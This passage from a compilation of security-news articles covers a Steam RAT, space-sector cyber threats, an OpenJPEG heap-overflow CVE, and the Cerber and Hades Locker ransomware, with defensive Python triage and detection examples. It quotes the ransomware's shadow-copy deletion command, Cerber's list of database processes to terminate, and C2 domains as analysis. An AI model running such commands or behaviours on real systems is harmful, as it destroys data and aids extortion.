For those who are concerned they are infected with this Steam Trojan, I suggest checking for the %AppData%\lappclimtfldr folder and the mcrtvclient.exe file inside it, and for any autostart entry that points to it.
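The chain above (PowerShell stager, files dropped under %AppData%\lappclimtfldr, an autostart for mcrtvclient.exe, and a connection to leyv.pw:11678) is easy to express as a correlation over endpoint telemetry. The following is an added example, not code from the original post: the indicator values are the ones named above, the Sysmon-style events are constructed, and two details are assumptions used only for the heuristics (that the autostart is a per-user Run value, and that the renamed NetSupport client still carries its original PE name, client32.exe).

```python
"""Correlate endpoint telemetry into the Steam 'Flash update' RAT chain.

Added triage example; indicator values come from the write-up above.
The Run-key location and NetSupport's original file name (client32.exe)
are assumptions, and the events below are constructed."""
from collections import defaultdict


def _low(ev, key):
    return str(ev.get(key, "")).lower()


# (stage, event type, predicate) in the order the infection unfolds
STAGE_RULES = [
    ("stager", "ProcessCreate",
     lambda e: "powershell" in _low(e, "image")
     and ("zaga.ps1" in _low(e, "cmdline") or "zahr.pw" in _low(e, "cmdline"))),
    ("dropped", "FileCreate",
     lambda e: "\\appdata\\roaming\\lappclimtfldr\\" in _low(e, "path")),
    ("autostart", "RegistryValueSet",          # assumption: a per-user Run value
     lambda e: "\\currentversion\\run" in _low(e, "key")
     and "mcrtvclient.exe" in _low(e, "data")),
    ("beacon", "NetworkConnect",
     lambda e: _low(e, "dest_host").rstrip(".") == "leyv.pw"
     or e.get("dest_port") == 11678),
]


def verdict(stages):
    """Beaconing to the gateway, or drop plus persistence together, is enough to call it."""
    if "beacon" in stages or {"dropped", "autostart"} <= stages:
        return "infected"
    return "suspicious" if stages else "clean"


def triage(events):
    """Return {host: {"stages": [...], "verdict": ...}} from a list of event dicts."""
    per_host = defaultdict(dict)
    for ev in events:
        hits = per_host[ev["host"]]            # registers the host even if nothing matches
        for stage, etype, match in STAGE_RULES:
            if ev["type"] == etype and stage not in hits and match(ev):
                hits[stage] = ev
        # Renamed-binary heuristic (assumption): the PE's original name still says client32.exe
        if ev["type"] == "ProcessCreate" and "renamed_netsupport" not in hits:
            base = _low(ev, "image").rsplit("\\", 1)[-1]
            if _low(ev, "original_filename") == "client32.exe" and base != "client32.exe":
                hits["renamed_netsupport"] = ev
    return {h: {"stages": sorted(s), "verdict": verdict(set(s))} for h, s in per_host.items()}


# Constructed Sysmon-style events: ws01 walks the whole chain, ws02 is benign.
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "ProcessCreate",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -ep bypass -f C:\\Users\\bob\\AppData\\Local\\Temp\\zaga.ps1"},
    {"host": "ws01", "type": "FileCreate",
     "path": "C:\\Users\\bob\\AppData\\Roaming\\lappclimtfldr\\mcrtvclient.exe"},
    {"host": "ws01", "type": "RegistryValueSet",
     "key": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\mcrtvclient",
     "data": "C:\\Users\\bob\\AppData\\Roaming\\lappclimtfldr\\mcrtvclient.exe"},
    {"host": "ws01", "type": "ProcessCreate",
     "image": "C:\\Users\\bob\\AppData\\Roaming\\lappclimtfldr\\mcrtvclient.exe",
     "original_filename": "client32.exe", "cmdline": "mcrtvclient.exe"},
    {"host": "ws01", "type": "NetworkConnect",
     "image": "C:\\Users\\bob\\AppData\\Roaming\\lappclimtfldr\\mcrtvclient.exe",
     "dest_host": "leyv.pw", "dest_port": 11678},
    {"host": "ws02", "type": "NetworkConnect",
     "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "dest_host": "store.steampowered.com", "dest_port": 443},
]

if __name__ == "__main__":
    for host, r in triage(SAMPLE_EVENTS).items():
        print(host, r["verdict"], ", ".join(r["stages"]))
```

The verdict deliberately does not require every stage: the stager runs once and may predate log retention, whereas the dropped folder, the autostart and the gateway beacon persist and are enough on their own.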

Furthermore, all users must be careful with what links they visit and what downloads they install. These days it is becoming more and more frequent for accounts to be hacked and then used to distribute malware. Stay vigilant, be careful, and make sure you have antivirus software installed.

 Source:http://www.bleepingcomputer.com

The post Hacked Steam accounts spreading Remote Access Trojan appeared first on Information Security Newspaper.

Space Wars Will Be Fought With Hacks, Not Missiles


On Monday morning, a number of professionals in the aerospace industry received a rather mundane email containing a PDF ostensibly about the future of Russian aerospace programs, but which actually contained a ‘Komplex’ trojan.

The Komplex trojan connects the victim’s computer to a remote command and control server, the centralized machine that issues commands to a botnet. Although nothing malicious has been observed in connection with Komplex yet, this could change should the hackers believed responsible (the Sofacy Group, an infamous cyberespionage collective) send commands through that server to be executed on the infected computers.

The Sofacy Group’s chosen target—the aerospace industry—is instructive, insofar as it speaks to the growing vulnerability of space systems in the information age. To address this issue, a panel of security experts convened at the International Astronautical Congress on Friday morning to discuss cyber-vulnerabilities particular to the space sector and how to protect it against hacking.

“Space and cyberspace are gradually becoming fields of warfare very much equivalent to land, sea and air,” said Deganit Paikowsky, a space policy researcher at Tel Aviv University. “We’re talking about new domains of conducting war in the information age. If you have space dominance, you can fight more efficiently on and off the battlefield.”

It didn’t take long for the US Armed Forces to realize the value of space technology on the battlefield, and in 1985 it created the United States Space Command (USSPACECOM) to figure out how to leverage outer space for use in military operations. Soon thereafter, the US military was able to put its space division to the test during the first Gulf War.

In 1991, a US-led coalition began a bombing campaign against Iraq in response to the country’s invasion of Kuwait. During this campaign the US military relied heavily on space systems (particularly GPS) for intelligence and guiding weapons to their intended targets. The invasion of Iraq turned out to be a proving ground for the military use of space technologies, and they would continue to be heavily and successfully used during other US military campaigns throughout the 90s in places like Afghanistan and the Balkans.

F/A-18 refuels while in flight to a target during the Gulf War. Image: Wikimedia Commons

Today, the use of space tech for military ends is pretty much a given: satellites guide US missiles, coordinate drone strikes, and allow officers to remotely surveil an area from dozens of miles up. For an idea of just how reliant the military has become on space tech, the US Army has about 250,000 GPS-dependent systems in total.

The only difference is that the US is no longer the sole power leveraging space for military ends—other spacefaring nations have also seen the strategic value of space systems. This threat to the United States’ total dominance in space has led to talk about an impending space war among the military elite. The thinking is that if you can achieve dominance in orbit, you will always have dominance on terrestrial battlefields.

According to Paikowsky, the form this space war is likely to take won’t involve the exploding satellites imagined by Reagan. Instead, the space wars of the future will be waged in cyberspace, exploiting and compromising network-connected space systems. The reason, she said, is simple: kinetic warfare (using anti-satellite missiles to blow things up in orbit) generates a ton of debris and makes space unusable for everybody, including the aggressor.

“Not using kinetic attacks is a question of sustainability and safety of the space environment,” said Paikowsky. “Cyber attacks are becoming much more likely to be used against space systems if a country still wants to be considered a responsible player.”

Aside from the symbolic factor of attacking a nation’s space assets in cyberspace, there is the added benefit that these attacks can be carried out without ever having to come face to face with the enemy. The issue is that because space technologies are inherently dual-use (meaning they can be used by both civil and military entities), an attack on a country’s space assets may end up inadvertently damaging civil satellites instead of military satellites.

This threat to civil space tech, along with previous instances where space assets have been compromised (like when a cosmonaut accidentally brought a computer virus to the International Space Station on a USB stick) has led space agencies to begin ramping up their internal cybersecurity divisions to deal with the growing threat of political or military space hacking.

A prime example is the European Space Agency’s development of a cybersecurity range in Redu, a small village in Luxembourg. Here the ESA will train employees how to recognize and deal with cyberattacks in realistic simulations. The program was launched in February and will be ready to begin training sessions later this month.

“Space systems are symbols of national power and this makes them appealing targets,” said Paikowsky. “Harmful activity is to be expected in the intersection between cyber and space.”


The post Space Wars Will Be Fought With Hacks, Not Missiles appeared first on Information Security Newspaper.

OpenJPEG zero-day flaw leads to remote code execution


The newly-discovered bug gives attackers the chance to execute code through the open-source JPEG 2000 codec.

Cisco Talos researchers have uncovered a severe zero-day flaw in the OpenJPEG JPEG 2000 codec which could lead to remote code execution on affected systems.

On Friday, researchers from Cisco revealed the existence of the zero-day flaw in the JPEG 2000 image file format parser implemented in the OpenJPEG library. The vulnerability, tracked as CVE-2016-8332, allows an out-of-bounds heap write, resulting in heap corruption and arbitrary code execution.


OpenJPEG is an open-source JPEG 2000 codec. Written in C, the software was created to promote JPEG 2000, an image compression standard which is in popular use and is often used for tasks including embedding images within PDF documents through software including Poppler, MuPDF and Pdfium.

The bug, assigned a CVSS score of 7.5, is caused by errors in parsing MCC records in the JPEG 2000 file, resulting in “an erroneous read and write of adjacent heap area memory.” If manipulated, these errors can lead to heap metadata and process memory corruption.

In a security advisory, the team said the vulnerability can be exploited if victims open specially crafted, malicious JPEG 2000 images. For example, if such an image arrives in a phishing email or is hosted on legitimate services such as Google Drive or Dropbox, then once it is downloaded and opened on the victim’s system the path is created for attackers to execute code remotely.
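MCC (0xFF75) belongs to the JPEG 2000 Part 2 multiple component transform family, together with MCT (0xFF74) and MCO (0xFF77); most JPEG 2000 images, including the ones embedded in PDFs, never carry these markers, so their presence in a file is worth a look while a patched OpenJPEG is rolled out. The following is an added triage example, not Talos’ or OpenJPEG’s code: it walks the main header of a raw codestream (or the jp2c box of a JP2 file), reports the component count from SIZ and any MCT-family segments, and does not reproduce the bug. The sample codestreams are constructed, and the MCC payload in them is arbitrary bytes, not a trigger.

```python
"""Inventory the main header of a JPEG 2000 codestream and flag Part 2
MCT/MCC/MCO marker segments. Added example; fixtures are constructed."""
import struct

SOC, SIZ, SOT, SOD, EOC = 0xFF4F, 0xFF51, 0xFF90, 0xFF93, 0xFFD9
PART2_MCT = {0xFF74: "MCT", 0xFF75: "MCC", 0xFF77: "MCO"}
NO_LENGTH = {SOC, SOD, EOC}                  # markers that carry no Lseg field
JP2_SIGNATURE = b"\x00\x00\x00\x0cjP  \r\n\x87\n"


def codestream_from_jp2(data):
    """Return the 'jp2c' box payload of a JP2 file; raw .j2k data is returned as-is."""
    if not data.startswith(JP2_SIGNATURE):
        return data
    pos = 0
    while pos + 8 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        btype, header = data[pos + 4:pos + 8], 8
        if length == 1:                      # XLBox: 64-bit length follows the type
            (length,), header = struct.unpack(">Q", data[pos + 8:pos + 16]), 16
        elif length == 0:                    # box extends to end of file
            length = len(data) - pos
        if length < header:
            raise ValueError("bad JP2 box length at offset %d" % pos)
        if btype == b"jp2c":
            return data[pos + header:pos + length]
        pos += length
    raise ValueError("no contiguous codestream box")


def main_header_segments(cs):
    """Yield (marker, offset, payload) for each segment before the first tile-part (SOT)."""
    if len(cs) < 2 or struct.unpack(">H", cs[:2])[0] != SOC:
        raise ValueError("codestream does not start with SOC")
    pos = 2
    while pos + 2 <= len(cs):
        (marker,) = struct.unpack(">H", cs[pos:pos + 2])
        if marker in (SOT, EOC):
            return
        if marker in NO_LENGTH:
            pos += 2
            continue
        if pos + 4 > len(cs):
            raise ValueError("truncated marker segment at offset %d" % pos)
        (lseg,) = struct.unpack(">H", cs[pos + 2:pos + 4])   # Lseg counts itself, not the marker
        if lseg < 2 or pos + 2 + lseg > len(cs):
            raise ValueError("marker 0x%04X at offset %d has bad length %d" % (marker, pos, lseg))
        yield marker, pos, cs[pos + 4:pos + 2 + lseg]
        pos += 2 + lseg


def triage_jp2(data):
    """Summarise the main header: Csiz from SIZ and any Part 2 MCT-family segments."""
    report = {"components": None, "markers": [], "part2_mct": []}
    for marker, offset, payload in main_header_segments(codestream_from_jp2(data)):
        report["markers"].append(marker)
        if marker == SIZ and len(payload) >= 36:
            report["components"] = struct.unpack(">H", payload[34:36])[0]   # Csiz
        if marker in PART2_MCT:
            report["part2_mct"].append((PART2_MCT[marker], offset, len(payload)))
    return report


# --- constructed fixtures ---------------------------------------------------
def _segment(marker, payload):
    return struct.pack(">HH", marker, len(payload) + 2) + payload


def _siz(ncomp=3, width=8, height=8):
    body = struct.pack(">HIIIIIIIIH", 0, width, height, 0, 0, width, height, 0, 0, ncomp)
    return _segment(SIZ, body + b"\x07\x01\x01" * ncomp)   # 8-bit unsigned, no subsampling


BENIGN = struct.pack(">H", SOC) + _siz() + _segment(0xFF52, b"\x00" * 10) + struct.pack(">H", SOT)
SUSPECT = (struct.pack(">H", SOC) + _siz()
           + _segment(0xFF75, b"\x00\x01\x00\x01\x00\x00\x00\xff\xff")   # arbitrary bytes, not a trigger
           + struct.pack(">H", SOT))
WRAPPED = (JP2_SIGNATURE + struct.pack(">I4s", 12, b"ftyp") + b"jp2 "
           + struct.pack(">I4s", 8 + len(SUSPECT), b"jp2c") + SUSPECT)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspect", SUSPECT), ("wrapped", WRAPPED)):
        print(name, triage_jp2(blob))
```

Feed it the bytes of a .jp2/.j2k attachment, or a JPXDecode stream extracted from a PDF, and treat any entry in part2_mct as a reason to open the file only in a patched viewer; a length error from the walker is itself a sign the header is not what a normal encoder writes.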

The vulnerability was discovered by Aleksander Nikolic from the Cisco Talos security team in OpenJpeg openjp2 version 2.1.1.

Cisco Talos disclosed the vulnerability to affected vendors on 26 July, granting them time to prepare patches to fix the problem before public release.

Source:http://www.zdnet.com/


The post OpenJPEG zero-day flaw leads to remote code execution appeared first on Information Security Newspaper.


How hard is it to hack the average DVR? Sadly, not hard at all


Successful compromises come “a couple times an hour,” researcher finds.

A major battle is underway for control over hundreds of millions of network-connected digital video recorders, cameras, and other so-called Internet of Things devices. As Ars has chronicled over the past two weeks, hackers are corralling them into networks that are menacing the security news site KrebsOnSecurity and other Web destinations with some of the biggest distributed denial-of-service attacks ever recorded.


The post How hard is it to hack the average DVR? Sadly, not hard at all appeared first on Information Security Newspaper.

Cerber Ransomware switches to a Random Extension and Ends Database Processes


Late last week, a new version of Cerber Ransomware was released that includes some new features. The most notable changes are the switch from the static .cerber3 extension for encrypted files to a random four-character extension, the use of an HTA file as the ransom note, and the termination of various database processes before encryption.

With this version, when a victim’s files are encrypted, not only will the filename be scrambled, but the extension will be replaced as well.  This means that a file that was previously encrypted as 5NgPiSr5zo.cerber3, would now be encrypted to a name like 1xQHJgozZM.b71c.

This version also includes a new ransom note called README.hta. When launched, it opens in an application window and displays the usual ransom text. An example of the README.hta file can be found below.

Readme.hta File

According to security researcher BloodDolly, this update also includes the addition of new database processes that are closed by the close_process directive in Cerber’s configuration.  This directive tells Cerber to terminate certain processes before encryption begins. The directive and the current list of processes being terminated are:

 "close_process":
 {
  "close_process":1,
  "process":["msftesql.exe","sqlagent.exe","sqlbrowser.exe","sqlservr.exe","sqlwriter.exe","oracle.exe","ocssd.exe","dbsnmp.exe","synctime.exe","mydesktopqos.exe","agntsvc.exeisqlplussvc.exe","xfssvccon.exe","mydesktopservice.exe","ocautoupds.exe","agntsvc.exeagntsvc.exe","agntsvc.exeencsvc.exe","firefoxconfig.exe","tbirdconfig.exe","ocomm.exe","mysqld.exe","mysqld-nt.exe","mysqld-opt.exe","dbeng50.exe","sqbcoreservice.exe"]
 },

These processes are closed so that their data files can be encrypted: if they are still running during encryption, the corresponding data files may be held open and inaccessible to Cerber.
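The same list works in the other direction: a single process that obtains terminate rights on several of these database and mail-client processes within a short window is a strong pre-encryption signal, whatever the ransomware family. The block below is an added example, not Cerber’s code or BloodDolly’s: it loads the close_process list quoted above (the malformed entries such as "agntsvc.exeisqlplussvc.exe" are kept exactly as the malware has them) and runs a sliding-window count over constructed events shaped like Sysmon event 10 (ProcessAccess), where GrantedAccess bit 0x0001 is PROCESS_TERMINATE.

```python
"""Behavioural detection built from Cerber's close_process list: one source image
gaining PROCESS_TERMINATE on several listed processes within a short window.
Added example; event shape mirrors Sysmon event 10 and the events are constructed."""
import json
from collections import defaultdict

# The list quoted from the Cerber configuration above, wrapped so json.loads accepts it.
CERBER_CLOSE_PROCESS = json.loads('''{
 "close_process": {
  "close_process": 1,
  "process": ["msftesql.exe","sqlagent.exe","sqlbrowser.exe","sqlservr.exe","sqlwriter.exe",
   "oracle.exe","ocssd.exe","dbsnmp.exe","synctime.exe","mydesktopqos.exe",
   "agntsvc.exeisqlplussvc.exe","xfssvccon.exe","mydesktopservice.exe","ocautoupds.exe",
   "agntsvc.exeagntsvc.exe","agntsvc.exeencsvc.exe","firefoxconfig.exe","tbirdconfig.exe",
   "ocomm.exe","mysqld.exe","mysqld-nt.exe","mysqld-opt.exe","dbeng50.exe","sqbcoreservice.exe"]
 }
}''')
TARGETS = {p.lower() for p in CERBER_CLOSE_PROCESS["close_process"]["process"]}
PROCESS_TERMINATE = 0x0001


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_mass_terminate(events, threshold=3, window=60):
    """Alert when one source image gets PROCESS_TERMINATE on >= threshold distinct
    targets from the list within `window` seconds. Returns a list of alert dicts."""
    per_source = defaultdict(list)
    for ev in events:
        if ev["granted_access"] & PROCESS_TERMINATE and _basename(ev["target_image"]) in TARGETS:
            per_source[(ev["host"], ev["source_image"])].append(ev)
    alerts = []
    for (host, source), evs in per_source.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:   # slide the window forward
                start += 1
            victims = {_basename(e["target_image"]) for e in evs[start:end + 1]}
            if len(victims) >= threshold:
                alerts.append({"host": host, "source_image": source,
                               "victims": sorted(victims), "first_ts": evs[start]["ts"]})
                break                                             # one alert per source
    return alerts


# Constructed events (ts in seconds). kjdh3.exe is a made-up dropper name.
SQL_BIN = "C:\\Program Files\\Microsoft SQL Server\\MSSQL13.MSSQLSERVER\\MSSQL\\Binn\\"
DROPPER = "C:\\Users\\alice\\AppData\\Roaming\\kjdh3.exe"
SAMPLE_EVENTS = [
    {"ts": 100, "host": "db01", "source_image": DROPPER, "target_image": SQL_BIN + "sqlservr.exe", "granted_access": 0x1},
    {"ts": 101, "host": "db01", "source_image": DROPPER, "target_image": SQL_BIN + "sqlwriter.exe", "granted_access": 0x1},
    {"ts": 102, "host": "db01", "source_image": DROPPER, "target_image": "C:\\Windows\\notepad.exe", "granted_access": 0x1},
    {"ts": 103, "host": "db01", "source_image": DROPPER, "target_image": "C:\\Program Files\\MySQL\\bin\\mysqld.exe", "granted_access": 0x1},
    # a service stop by services.exe touches a single target: no alert
    {"ts": 500, "host": "db01", "source_image": "C:\\Windows\\System32\\services.exe", "target_image": SQL_BIN + "sqlservr.exe", "granted_access": 0x1},
    # query-only access (no PROCESS_TERMINATE bit) is ignored
    {"ts": 101, "host": "ws07", "source_image": "C:\\Windows\\System32\\taskmgr.exe", "target_image": SQL_BIN + "sqlservr.exe", "granted_access": 0x1400},
]

if __name__ == "__main__":
    for alert in detect_mass_terminate(SAMPLE_EVENTS):
        print(alert)
```

Tune the threshold to the host role: a database server legitimately restarts sqlservr.exe and sqlwriter.exe together during patching, so the source image (services.exe, the SQL setup binary) matters as much as the count.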

Finally, this version of Cerber Ransomware continues to send UDP packets to the 31.184.234.0/23 range for statistical purposes.

UDP Packets

Source:http://www.bleepingcomputer.com/


The post Cerber Ransomware switches to a Random Extension and Ends Database Processes appeared first on Information Security Newspaper.

WildFire rises from the grave as the rebranded Hades Locker


The WildFire Locker ransomware has risen from the dead and rebranded itself using the apropos name of Hades Locker. In late August, WildFire Locker disappeared after the organizations behind NoMoreRansom.org were able to seize control of the ransomware’s Command & Control servers. This allowed NoMoreRansom to gain access to many of the decryption keys for the ransomware’s victims. Unfortunately, the ransomware developers were not apprehended and it now appears they have been biding their time before releasing a new ransomware.

Hades Locker was discovered yesterday by Michael Gillespie when a victim uploaded a copy of the ransomware’s ransom note to ID Ransomware.


Today, Proofpoint security researcher Matthew Mesa discovered a sample and, after MalwareHunterTeam examined it, it was determined that Hades Locker is a new version of WildFire Locker.

Unfortunately, at this time the encryption used by Hades Locker is secure, so there is no way to recover a victim’s files for free. For those who wish to discuss this ransomware further, you can use the Hades Locker Help & Support Topic.

The Hades Locker Encryption Process

It is not currently known how Hades Locker is being distributed, but once executed it connects to http://ip-api.com/xml to retrieve the victim’s IP address and geographic location. It then sends a unique victim ID (called hwid), a tracking ID (currently set to 0002), the computer name, the user name, the country, and the victim’s IP address to one of the configured Command & Control servers.

Information Sent

The command and control server will then reply with a password to use to encrypt the files using AES encryption.

During this process, Hades Locker stores the hwid in the Registry together with a Status entry that is set to 0 or 1 depending on whether the encryption process has finished. The registry key this information is written to is:

HKCU\Software\Wow6232Node

Note the spelling: the legitimate WOW64 redirection key is Wow6432Node, and it lives under HKLM. A misspelled Wow6232Node under HKCU is the malware’s own and makes a clean detection indicator.
Saving Information to the Registry

Hades Locker then encrypts all files on mapped drives that match certain file extensions. It encrypts with AES and appends an extension made up of the string “.~HL” plus the first five characters of the encryption password. For example, test.jpg could be encrypted as test.jpg.~HLH6215.

Encrypted Files

The file extensions targeted by Hades Locker are:

.contact,.dbx,.doc,.docx,.jnt,.jpg,.mapimail,.msg,.oab,.ods,.pdf,.pps,.ppsm,.ppt,.pptm,.prf,.pst,.rar,.rtf,.txt,.wab,.xls,.xlsx,.xml,.zip,.1cd,.3ds,.3g2,.3gp,.7z,.7zip,.accdb,.aoi,.asf,.asp,.aspx,.asx,.avi,.bak,.cer,.cfg,.class,.config,.css,.csv,.db,.dds,.dwg,.dxf,.flf,.flv,.html,.idx,.js,.key,.kwm,.laccdb,.ldf,.lit,.m3u,.mbx,.md,.mdf,.mid,.mlb,.mov,.mp3,.mp4,.mpg,.obj,.odt,.pages,.php,.psd,.pwm,.rm,.safe,.sav,.save,.sql,.srt,.swf,.thm,.vob,.wav,.wma,.wmv,.xlsb,.3dm,.aac,.ai,.arw,.c,.cdr,.cls,.cpi,.cpp,.cs,.db3,.docm,.dot,.dotm,.dotx,.drw,.dxb,.eps,.fla,.flac,.fxg,.java,.m,.m4v,.max,.mdb,.pcd,.pct,.pl,.potm,.potx,.ppam,.ppsm,.ppsx,.pptm,.ps,.pspimage,.r3d,.rw2,.sldm,.sldx,.svg,.tga,.wps,.xla,.xlam,.xlm,.xlr,.xlsm,.xlt,.xltm,.xltx,.xlw,.act,.adp,.al,.bkp,.blend,.cdf,.cdx,.cgm,.cr2,.crt,.dac,.dbf,.dcr,.ddd,.design,.dtd,.fdb,.fff,.fpx,.h,.iif,.indd,.jpeg,.mos,.nd,.nsd,.nsf,.nsg,.nsh,.odc,.odp,.oil,.pas,.pat,.pef,.pfx,.ptx,.qbb,.qbm,.sas7bdat,.say,.st4,.st6,.stc,.sxc,.sxw,.tlg,.wad,.xlk,.aiff,.bin,.bmp,.cmt,.dat,.dit,.edb,.flvv,.gif,.groups,.hdd,.hpp,.log,.m2ts,.m4p,.mkv,.mpeg,.ndf,.nvram,.ogg,.ost,.pab,.pdb,.pif,.png,.qed,.qcow,.qcow2,.rvt,.st7,.stm,.vbox,.vdi,.vhd,.vhdx,.vmdk,.vmsd,.vmx,.vmxf,.3fr,.3pr,.ab4,.accde,.accdr,.accdt,.ach,.acr,.adb,.ads,.agdl,.ait,.apj,.asm,.awg,.back,.backup,.backupdb,.bank,.bay,.bdb,.bgt,.bik,.bpw,.cdr3,.cdr4,.cdr5,.cdr6,.cdrw,.ce1,.ce2,.cib,.craw,.crw,.csh,.csl,.db_journal,.dc2,.dcs,.ddoc,.ddrw,.der,.des,.dgc,.djvu,.dng,.drf,.dxg,.eml,.erbsql,.erf,.exf,.ffd,.fh,.fhd,.gray,.grey,.gry,.hbk,.ibank,.ibd,.ibz,.iiq,.incpas,.jpe,.kc2,.kdbx,.kdc,.kpdx,.lua,.mdc,.mef,.mfw,.mmw,.mny,.moneywell,.mrw,.myd,.ndd,.nef,.nk2,.nop,.nrw,.ns2,.ns3,.ns4,.nwb,.nx2,.nxl,.nyf,.odb,.odf,.odg,.odm,.orf,.otg,.oth,.otp,.ots,.ott,.p12,.p7b,.p7c,.pdd,.pem,.plus_muhd,.plc,.pot,.pptx,.psafe3,.py,.qba,.qbr,.qbw,.qbx,.qby,.raf,.rat,.raw,.rdb,.rwl,.rwz,.s3db,.sd0,.sda,.sdf,.sqlite,.sqlite3,.sqlitedb,.sr2,.srf,.srw,.st5,.st8,.std,.sti,.stw,.stx,.sxd,.sxg,.sxi,.sxm,.tex,.wallet,.wb2,.wpd,.x11,.x3f,.xis,.ycbcra,.yuv

While performing encryption, it will skip any files whose path contain the following strings:

windows
program files
program files (x86)
system volume information
$recycle.bin

To prevent victims from recovering their files from the Shadow Volume Copies, it will delete them using the following command:

WMIC.exe shadowcopy delete /nointeractive

Finally, in each folder where a file is encrypted it also creates three ransom notes named README_RECOVER_FILES_[victim_id].html, README_RECOVER_FILES_[victim_id].png, and README_RECOVER_FILES_[victim_id].txt.
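The naming rules above (the “.~HL” plus five-character extension, the README_RECOVER_FILES_[victim_id] notes, and the path strings the malware skips) are enough to sort a file listing from an affected host or share and to recover the victim id and the password prefix for a case record. The block below is an added example, not the researchers’ or the malware’s code; the listing and the victim id in it are constructed, and it assumes the five characters after “.~HL” are alphanumeric.

```python
"""Sort a file listing into Hades Locker artefacts. Added triage example:
extension pattern, note names and skip strings come from the write-up above;
the listing is constructed. The password prefix is assumed alphanumeric."""
import re

ENCRYPTED_RE = re.compile(r"^(?P<original>.+)\.~HL(?P<pw_prefix>[A-Za-z0-9]{5})$")
NOTE_RE = re.compile(r"^README_RECOVER_FILES_(?P<victim_id>[A-Za-z0-9]+)\.(?:html|png|txt)$", re.I)
SKIP_STRINGS = ("windows", "program files", "program files (x86)",
                "system volume information", "$recycle.bin")


def is_skipped(path):
    """Hades Locker skips any path containing one of the strings (case-insensitive substring)."""
    low = path.lower()
    return any(s in low for s in SKIP_STRINGS)


def original_name(encrypted_name):
    """Strip the Hades Locker extension: 'test.jpg.~HLH6215' -> 'test.jpg'."""
    m = ENCRYPTED_RE.match(encrypted_name)
    return m["original"] if m else None


def triage_listing(paths):
    """Classify paths into encrypted files, ransom notes, files the malware skips by design, and the rest."""
    out = {"encrypted": [], "notes": [], "victim_ids": set(), "pw_prefixes": set(),
           "skipped_by_malware": [], "encrypted_in_skipped_path": [], "other": []}
    for path in paths:
        name = path.replace("/", "\\").rsplit("\\", 1)[-1]
        m = ENCRYPTED_RE.match(name)
        if m:
            out["encrypted"].append(path)
            out["pw_prefixes"].add(m["pw_prefix"])
            if is_skipped(path):            # contradicts the skip rule: a different sample, or a different actor
                out["encrypted_in_skipped_path"].append(path)
            continue
        n = NOTE_RE.match(name)
        if n:
            out["notes"].append(path)
            out["victim_ids"].add(n["victim_id"])
        elif is_skipped(path):
            out["skipped_by_malware"].append(path)
        else:
            out["other"].append(path)
    return out


# Constructed listing; 7F3A9C is a made-up victim id.
SAMPLE_LISTING = [
    "C:\\Users\\alice\\Documents\\budget.xlsx.~HLH6215",
    "Z:\\shares\\photos\\trip.jpg.~HLH6215",
    "C:\\Users\\alice\\Documents\\README_RECOVER_FILES_7F3A9C.html",
    "C:\\Users\\alice\\Documents\\README_RECOVER_FILES_7F3A9C.txt",
    "C:\\Windows\\System32\\drivers\\etc\\hosts",
    "C:\\Program Files (x86)\\SomeApp\\readme.txt",
    "C:\\Users\\alice\\Downloads\\setup.exe",
]

if __name__ == "__main__":
    result = triage_listing(SAMPLE_LISTING)
    print(len(result["encrypted"]), "encrypted;", "prefixes:", sorted(result["pw_prefixes"]),
          "victim ids:", sorted(result["victim_ids"]))
```

Two things the output tells you: more than one password prefix in a single listing means more than one infected host (or run) wrote to that share, and because the skip test is a plain substring match on the whole path, anything under a folder whose name contains “windows” (for example …\AppData\Roaming\Microsoft\Windows\…) is spared too, which is why some user data survives.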

Text Ransom Note

These ransom notes contain links to the Command & Control servers at n7457xrhg5kibr2c.onion, http://pfmydcsjib.ru, and http://jdybchotfn.ru. Victims are advised to go to one of these sites to learn the ransom amount and for instructions on how to make a payment.

The Hades Locker Payment Site

The Hades Locker payment site can be reached via the two C2 servers on the clearnet or by connecting directly to the Tor onion address. To connect directly to the onion site, victims need Tor (the Tor Browser). Using two clearnet sites as gateways to the Tor site makes it easier for victims to reach their payment instructions.

When a victim connects to the payment site they will be shown a general information page that describes how much they need to pay, what bitcoin address a payment should be sent to, and information on how to get bitcoins. On this payment site the developers refer to themselves as a company called Hades Enterprises.

Hades Locker Payment Site

In addition to the main information page, the Hades Locker payment site also includes the following sections:

Frequently Asked Questions page: This page contains answers to common questions.

Frequently Asked Questions Page

A test decryption page: This page supposedly allows a victim to perform a test decryption. In my tests, I could find no way to upload a file.

Test Decryption Page

A Help Desk page: This page allows a victim to ask support questions and receive responses from the ransomware developers.

Help Desk Page

A Decryption Tutorial Page: This page contains a tutorial on how to use the decryptor for those who paid the ransom.

Decryption Tutorial Page

Once again, for those who wish to discuss this ransomware further, you can use the Hades Locker Help & Support Topic.

Files associated with Hades Locker:

README_RECOVER_FILES_[victim_id].html
README_RECOVER_FILES_[victim_id].png
README_RECOVER_FILES_[victim_id].txt
%UserProfile%\AppData\Local\Temp\RarSFX0\
%UserProfile%\AppData\Local\Temp\RarSFX0\Ronms.exe
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ronms.lnk
%UserProfile%\AppData\Roaming\wow6232node\
%UserProfile%\AppData\Roaming\wow6232node\Bamvenagxe.xml
%UserProfile%\AppData\Roaming\wow6232node\Ronms.exe

Registry Entries associated with Hades Locker:

HKCU\Software\Wow6232Node\hwid	[victim_id]
HKCU\Software\Wow6232Node\status	1

Network Communication associated with Hades Locker:

n7457xrhg5kibr2c.onion
http://pfmydcsjib.ru
http://jdybchotfn.ru

Source:http://www.bleepingcomputer.com/

The post WildFire rises from the grave as the rebranded Hades Locker appeared first on Information Security Newspaper.

Explained: WMI hijackers


Windows Management Instrumentation (WMI) hijackers are proving to be a plague to remove for the average user. Even experienced users may be stumped if they run into one and don’t know where to look.

What are they?

To explain why they are so hard to find requires an introduction to WMI. As the name Windows Management Instrumentation implies, this is a set of tools that manage devices and applications in a Windows environment. This includes (remotely) changing system settings, properties, and permissions. One problem is that it’s not recommended to disable WMI, as you might with WScript, because it is also in use for system-critical operations (e.g. Windows Update).

So why is it so hard to find the malware?

